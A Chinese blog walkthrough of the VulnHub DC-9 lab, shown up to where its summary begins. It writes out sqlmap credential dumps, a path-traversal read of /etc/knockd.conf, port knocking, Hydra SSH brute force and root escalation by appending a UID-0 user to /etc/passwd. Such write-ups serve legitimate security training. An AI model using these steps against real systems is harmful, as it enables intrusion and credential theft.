<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>vulnhub-DC-9 | Six_plum</title><meta name="author" content="Six_plum"><meta name="copyright" content="Six_plum"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="vulnhub-DC-9信息收集nmap扫一下 1234567891011121314151617181920212223└─# nmap -A -p1-65535 192.168.20.139   Starting Nmap 7.94SVN ( https:&#x2F;&#x2F;nmap.org ) at 2024-11-26 19:54 CSTNmap scan report for 192.168.20.13">
<meta property="og:type" content="article">
<meta property="og:title" content="vulnhub-DC-9">
<meta property="og:url" content="https://hshdgyq.github.io/2024/11/26/vulnhub-DC-9/index.html">
<meta property="og:site_name" content="Six_plum">
<meta property="og:description" content="vulnhub-DC-9信息收集nmap扫一下 1234567891011121314151617181920212223└─# nmap -A -p1-65535 192.168.20.139   Starting Nmap 7.94SVN ( https:&#x2F;&#x2F;nmap.org ) at 2024-11-26 19:54 CSTNmap scan report for 192.168.20.13">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://hshdgyq.github.io/img/background.jpg">
<meta property="article:published_time" content="2024-11-26T11:55:11.000Z">
<meta property="article:modified_time" content="2024-11-26T12:58:17.666Z">
<meta property="article:author" content="Six_plum">
<meta property="article:tag" content="vulnhub">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://hshdgyq.github.io/img/background.jpg"><link rel="shortcut icon" href="/img/upper.jpg"><link rel="canonical" href="https://hshdgyq.github.io/2024/11/26/vulnhub-DC-9/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.min.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"/search.xml","preload":false,"languages":{"hits_empty":"找不到您查询的内容：${query}"}},
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: true,
    post: true
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'vulnhub-DC-9',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2024-11-26 20:58:17'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><link rel="stylesheet" href="/css/custom.css"><meta name="generator" content="Hexo 6.3.0"></head><body><div id="web_bg"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/header.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">34</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">9</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">5</div></a></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('/img/background.jpg')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Six_plum</a></span><div id="menus"><div id="search-button"><a class="site-page social-icon search"><i class="fas fa-search fa-fw"></i><span> 搜索</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">vulnhub-DC-9</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2024-11-26T11:55:11.000Z" title="发表于 2024-11-26 19:55:11">2024-11-26</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2024-11-26T12:58:17.666Z" title="更新于 2024-11-26 20:58:17">2024-11-26</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%B8%97%E9%80%8F/">渗透</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="vulnhub-DC-9"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h1 id="vulnhub-DC-9"><a href="#vulnhub-DC-9" class="headerlink" title="vulnhub-DC-9"></a>vulnhub-DC-9</h1><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p>nmap扫一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">└─# nmap -A -p1-65535 192.168.20.139   </span><br><span class="line">Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 19:54 CST</span><br><span class="line">Nmap scan report for 192.168.20.139</span><br><span class="line">Host is up (0.0015s latency).</span><br><span class="line">Not shown: 65533 closed tcp ports (reset)</span><br><span class="line">PORT   STATE    SERVICE VERSION</span><br><span class="line">22/tcp filtered ssh</span><br><span class="line">80/tcp open     http    Apache httpd 2.4.38 ((Debian))</span><br><span class="line">|_http-title: Example.com - Staff Details - Welcome</span><br><span class="line">|_http-server-header: Apache/2.4.38 (Debian)</span><br><span class="line">MAC Address: 00:0C:29:8D:A7:50 (VMware)</span><br><span class="line">Device type: general purpose</span><br><span class="line">Running: Linux 3.X|4.X</span><br><span class="line">OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4</span><br><span class="line">OS details: Linux 3.2 - 4.9</span><br><span class="line">Network Distance: 1 hop</span><br><span class="line"></span><br><span class="line">TRACEROUTE</span><br><span class="line">HOP RTT     ADDRESS</span><br><span class="line">1   1.46 ms 192.168.20.139</span><br><span class="line"></span><br><span class="line">OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 56.59 seconds</span><br></pre></td></tr></table></figure>

<p>这次80端口开放，但是22端口没开，可能有什么问题，先看看80端口</p>
<h2 id="sql注入"><a href="#sql注入" class="headerlink" title="sql注入"></a>sql注入</h2><p>在search页面很常规的sql注入，直接sqlmap跑</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">└─# sqlmap -r &quot;ma.txt&quot; --dbs --batch</span><br><span class="line">available databases [3]:</span><br><span class="line">[*] information_schema</span><br><span class="line">[*] Staff</span><br><span class="line">[*] users</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>先看一下Staff数据库，可以拿到管理员密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -r &quot;ma.txt&quot; -D Staff -T Users -C Username,Password --dump --batch</span><br><span class="line">+----------+----------------------------------+</span><br><span class="line">| Username | Password                         |</span><br><span class="line">+----------+----------------------------------+</span><br><span class="line">| admin    | 856f5de590ef37314e7c3bdf6f8a66dc |</span><br><span class="line">+----------+----------------------------------+</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>一眼md5，解密出来是transorbital1，登录后台成功，在Manage页面脚有一个File does not exist的提示，很显然有文件包含，猜测参数为file，果然可以，由于22端口关闭，猜测启用了knock服务，看一下有没有</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/addrecord.php?file=../../../../etc/knockd.conf</span><br><span class="line"></span><br><span class="line">[options] UseSyslog [openSSH] sequence = 7469,8475,9842 seq_timeout = 25 command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH] sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn</span><br></pre></td></tr></table></figure>

<p>果然有，使用暗号（7469,8475,9842）敲门</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">└─# nc -z 192.168.20.139 7469 8475 9842</span><br><span class="line"></span><br><span class="line">└─# nmap -A -p1-65535 192.168.20.139   </span><br><span class="line">Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 19:55 CST</span><br><span class="line">Nmap scan report for 192.168.20.139</span><br><span class="line">Host is up (0.0016s latency).</span><br><span class="line">Not shown: 65533 closed tcp ports (reset)</span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)</span><br><span class="line">| ssh-hostkey: </span><br><span class="line">|   2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)</span><br><span class="line">|   256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)</span><br><span class="line">|_  256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)</span><br><span class="line">80/tcp open  http    Apache httpd 2.4.38 ((Debian))</span><br><span class="line">|_http-title: Example.com - Staff Details - Welcome</span><br><span class="line">|_http-server-header: Apache/2.4.38 (Debian)</span><br><span class="line">MAC Address: 00:0C:29:8D:A7:50 (VMware)</span><br><span class="line">Device type: general purpose</span><br><span class="line">Running: Linux 3.X|4.X</span><br><span class="line">OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4</span><br><span class="line">OS details: Linux 3.2 - 4.9</span><br><span class="line">Network Distance: 1 hop</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br><span class="line"></span><br><span class="line">TRACEROUTE</span><br><span class="line">HOP RTT     ADDRESS</span><br><span class="line">1   1.64 ms 192.168.20.139</span><br><span class="line"></span><br><span class="line">OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 68.69 seconds</span><br></pre></td></tr></table></figure>

<p>ok，打开了，那么用户名密码呢，还记得数据库中还有个users吗，脱下来</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -r &quot;ma.txt&quot; -D users -T UserDetails -C username,password --dump --batch</span><br><span class="line"></span><br><span class="line">+-----------+---------------+</span><br><span class="line">| username  | password      |</span><br><span class="line">+-----------+---------------+</span><br><span class="line">| marym     | 3kfs86sfd     |</span><br><span class="line">| julied    | 468sfdfsd2    |</span><br><span class="line">| fredf     | 4sfd87sfd1    |</span><br><span class="line">| barneyr   | RocksOff      |</span><br><span class="line">| tomc      | TC&amp;TheBoyz    |</span><br><span class="line">| jerrym    | B8m#48sd      |</span><br><span class="line">| wilmaf    | Pebbles       |</span><br><span class="line">| bettyr    | BamBam01      |</span><br><span class="line">| chandlerb | UrAG0D!       |</span><br><span class="line">| joeyt     | Passw0rd      |</span><br><span class="line">| rachelg   | yN72#dsd      |</span><br><span class="line">| rossg     | ILoveRachel   |</span><br><span class="line">| monicag   | 3248dsds7s    |</span><br><span class="line">| phoebeb   | smellycats    |</span><br><span class="line">| scoots    | YR3BVxxxw87   |</span><br><span class="line">| janitor   | Ilovepeepee   |</span><br><span class="line">| janitor2  | Hawaii-Five-0 |</span><br><span class="line">+-----------+---------------+</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>用hydra爆一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">└─# hydra -L users.txt -P pass.txt 192.168.20.139 ssh</span><br><span class="line">Hydra v9.5 (c) 2023 by van Hauser/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).</span><br><span class="line"></span><br><span class="line">Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-26 20:12:47</span><br><span class="line">[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4</span><br><span class="line">[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task</span><br><span class="line">[DATA] attacking ssh://192.168.20.139:22/</span><br><span class="line">[22][ssh] host: 192.168.20.139   login: chandlerb   password: UrAG0D!</span><br><span class="line">[22][ssh] host: 192.168.20.139   login: joeyt   password: Passw0rd</span><br><span class="line">[STATUS] 247.00 tries/min, 247 tries in 00:01h, 45 to do in 00:01h, 13 active</span><br><span class="line">[22][ssh] host: 192.168.20.139   login: janitor   password: Ilovepeepee</span><br><span class="line">1 of 1 target successfully completed, 3 valid passwords found</span><br><span class="line">Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-26 20:14:02</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>拿到三个用户，都看了一下，只有janitor用户中存在可疑文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">└─# ssh janitor@192.168.20.139</span><br><span class="line">janitor@192.168.20.139&#x27;s password: </span><br><span class="line">Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64</span><br><span class="line"></span><br><span class="line">The programs included with the Debian GNU/Linux system are free software;</span><br><span class="line">the exact distribution terms for each program are described in the</span><br><span class="line">individual files in /usr/share/doc/*/copyright.</span><br><span class="line"></span><br><span class="line">Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent</span><br><span class="line">permitted by applicable law.</span><br><span class="line">janitor@dc-9:~$ ls</span><br><span class="line">janitor@dc-9:~$ cd /home/janitor</span><br><span class="line">janitor@dc-9:~$ ls</span><br><span class="line">janitor@dc-9:~$ ls -a</span><br><span class="line">.  ..  .bash_history  .gnupg  .secrets-for-putin</span><br><span class="line">janitor@dc-9:~$ car .secrets-for-putin/</span><br><span class="line">-bash: car: command not found</span><br><span class="line">janitor@dc-9:~$ cd  .secrets-for-putin/</span><br><span class="line">janitor@dc-9:~/.secrets-for-putin$ ls</span><br><span class="line">passwords-found-on-post-it-notes.txt</span><br><span class="line">janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt </span><br><span class="line">BamBam01</span><br><span class="line">Passw0rd</span><br><span class="line">smellycats</span><br><span class="line">P0Lic#10-4</span><br><span class="line">B4-Tru3-001</span><br><span class="line">4uGU5T-NiGHts</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>又是密码，写进密码本再爆破，又拿到一个用户</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[22][ssh] host: 192.168.20.139   login: fredf   password: B4-Tru3-001</span><br></pre></td></tr></table></figure>

<h2 id="sudo提权"><a href="#sudo提权" class="headerlink" title="sudo提权"></a>sudo提权</h2><p>常规操作sudo、suid</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">fredf@dc-9:~$ sudo -l</span><br><span class="line">Matching Defaults entries for fredf on dc-9:</span><br><span class="line">    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin</span><br><span class="line"></span><br><span class="line">User fredf may run the following commands on dc-9:</span><br><span class="line">    (root) NOPASSWD: /opt/devstuff/dist/test/test</span><br></pre></td></tr></table></figure>

<p>看看文件发现是二进制程序，翻找后发现是test.py生成的</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">fredf@dc-9:/opt/devstuff$ cat test.py</span><br><span class="line">#!/usr/bin/python</span><br><span class="line"></span><br><span class="line">import sys</span><br><span class="line"></span><br><span class="line">if len (sys.argv) != 3 :</span><br><span class="line">    print (&quot;Usage: python test.py read append&quot;)</span><br><span class="line">    sys.exit (1)</span><br><span class="line"></span><br><span class="line">else :</span><br><span class="line">    f = open(sys.argv[1], &quot;r&quot;)</span><br><span class="line">    output = (f.read())</span><br><span class="line"></span><br><span class="line">    f = open(sys.argv[2], &quot;a&quot;)</span><br><span class="line">    f.write(output)</span><br><span class="line">    f.close()</span><br></pre></td></tr></table></figure>

<p>就是将文件1追加写入文件2，那么就可以想到利用这个方法向&#x2F;etc&#x2F;passwd中添加root权限的用户</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line">fredf@dc-9:/opt/devstuff$ openssl passwd -1 -salt hsh hsh</span><br><span class="line">$1$hsh$TvjPz1RW6vswLzyLFta1c1</span><br><span class="line">fredf@dc-9:/tmp$ echo &#x27;hsh:$1$hsh$TvjPz1RW6vswLzyLFta1c1:0:0::/root:/bin/bash&#x27;&gt;hshdgyq</span><br><span class="line">fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test hshdgyq /etc/passwd</span><br><span class="line">Traceback (most recent call last):</span><br><span class="line">  File &quot;test.py&quot;, line 10, in &lt;module&gt;</span><br><span class="line">FileNotFoundError: [Errno 2] No such file or directory: &#x27;hshdgyq&#x27;</span><br><span class="line">[2699] Failed to execute script test</span><br><span class="line">fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/hshdgyq /etc/passwd</span><br><span class="line">fredf@dc-9:/opt/devstuff/dist/test$ cat /etc/passwd</span><br><span class="line">root:x:0:0:root:/root:/bin/bash</span><br><span class="line">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span><br><span class="line">bin:x:2:2:bin:/bin:/usr/sbin/nologin</span><br><span class="line">sys:x:3:3:sys:/dev:/usr/sbin/nologin</span><br><span class="line">sync:x:4:65534:sync:/bin:/bin/sync</span><br><span class="line">games:x:5:60:games:/usr/games:/usr/sbin/nologin</span><br><span class="line">man:x:6:12:man:/var/cache/man:/usr/sbin/nologin</span><br><span class="line">lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</span><br><span class="line">mail:x:8:8:mail:/var/mail:/usr/sbin/nologin</span><br><span class="line">news:x:9:9:news:/var/spool/news:/usr/sbin/nologin</span><br><span class="line">uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin</span><br><span class="line">proxy:x:13:13:proxy:/bin:/usr/sbin/nologin</span><br><span class="line">www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</span><br><span class="line">backup:x:34:34:backup:/var/backups:/usr/sbin/nologin</span><br><span class="line">list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin</span><br><span class="line">irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin</span><br><span class="line">gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin</span><br><span class="line">nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin</span><br><span class="line">_apt:x:100:65534::/nonexistent:/usr/sbin/nologin</span><br><span class="line">systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin</span><br><span class="line">systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin</span><br><span class="line">systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin</span><br><span class="line">messagebus:x:104:110::/nonexistent:/usr/sbin/nologin</span><br><span class="line">sshd:x:105:65534::/run/sshd:/usr/sbin/nologin</span><br><span class="line">systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin</span><br><span class="line">mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false</span><br><span class="line">marym:x:1001:1001:Mary Moe:/home/marym:/bin/bash</span><br><span class="line">julied:x:1002:1002:Julie Dooley:/home/julied:/bin/bash</span><br><span class="line">fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash</span><br><span class="line">barneyr:x:1004:1004:Barney Rubble:/home/barneyr:/bin/bash</span><br><span class="line">tomc:x:1005:1005:Tom Cat:/home/tomc:/bin/bash</span><br><span class="line">jerrym:x:1006:1006:Jerry Mouse:/home/jerrym:/bin/bash</span><br><span class="line">wilmaf:x:1007:1007:Wilma Flintstone:/home/wilmaf:/bin/bash</span><br><span class="line">bettyr:x:1008:1008:Betty Rubble:/home/bettyr:/bin/bash</span><br><span class="line">chandlerb:x:1009:1009:Chandler Bing:/home/chandlerb:/bin/bash</span><br><span class="line">joeyt:x:1010:1010:Joey Tribbiani:/home/joeyt:/bin/bash</span><br><span class="line">rachelg:x:1011:1011:Rachel Green:/home/rachelg:/bin/bash</span><br><span class="line">rossg:x:1012:1012:Ross Geller:/home/rossg:/bin/bash</span><br><span class="line">monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash</span><br><span class="line">phoebeb:x:1014:1014:Phoebe Buffay:/home/phoebeb:/bin/bash</span><br><span class="line">scoots:x:1015:1015:Scooter McScoots:/home/scoots:/bin/bash</span><br><span class="line">janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash</span><br><span class="line">janitor2:x:1017:1017:Scott Morrison:/home/janitor2:/bin/bash</span><br><span class="line">hsh:$1$hsh$TvjPz1RW6vswLzyLFta1c1:0:0::/root:/bin/bash</span><br></pre></td></tr></table></figure>

<p>现在切换用户可以拿到root权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">fredf@dc-9:/opt/devstuff/dist/test$ su hsh</span><br><span class="line">Password: </span><br><span class="line">root@dc-9:/opt/devstuff/dist/test# whoami</span><br><span class="line">root</span><br></pre></td></tr></table></figure>

<p>至此靶机攻克。vulnhub dc系列也到此为止结束了。</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>前面很常规，就文件写入这里我对于passwd文件的格式不是太熟悉，详细了解了一下：</p>
